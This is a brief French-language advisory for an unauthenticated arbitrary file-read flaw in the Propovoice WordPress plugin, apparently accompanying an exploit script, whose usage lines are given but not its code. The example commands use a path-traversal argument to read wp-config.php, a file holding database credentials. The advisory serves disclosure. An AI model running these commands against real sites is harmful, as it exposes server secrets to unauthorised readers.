
Propovoice <= 1.7.6.7 - Lecture arbitraire de fichier non authentifiée
Propovoice <= 1.7.6.7 - Lecture de fichier arbitraire non authentifiée
Le plugin Propovoice: All-in-One Client Management System pour WordPress est vulnérable à une lecture de fichier arbitraire dans toutes les versions jusqu'à la 1.7.6.7 incluse via la fonction send_email(). Cela permet à des attaquants non authentifiés de lire le contenu de fichiers arbitraires sur le serveur, pouvant contenir des informations sensibles.
Usage: python3 cve-2025-8422-exploit.py <target_url> <email_recipient> [target_file]
Examples:
python3 cve-2025-8422-exploit.py https://example.com [email protected]
python3 cve-2025-8422-exploit.py https://example.com [email protected] /../../../wp-config.php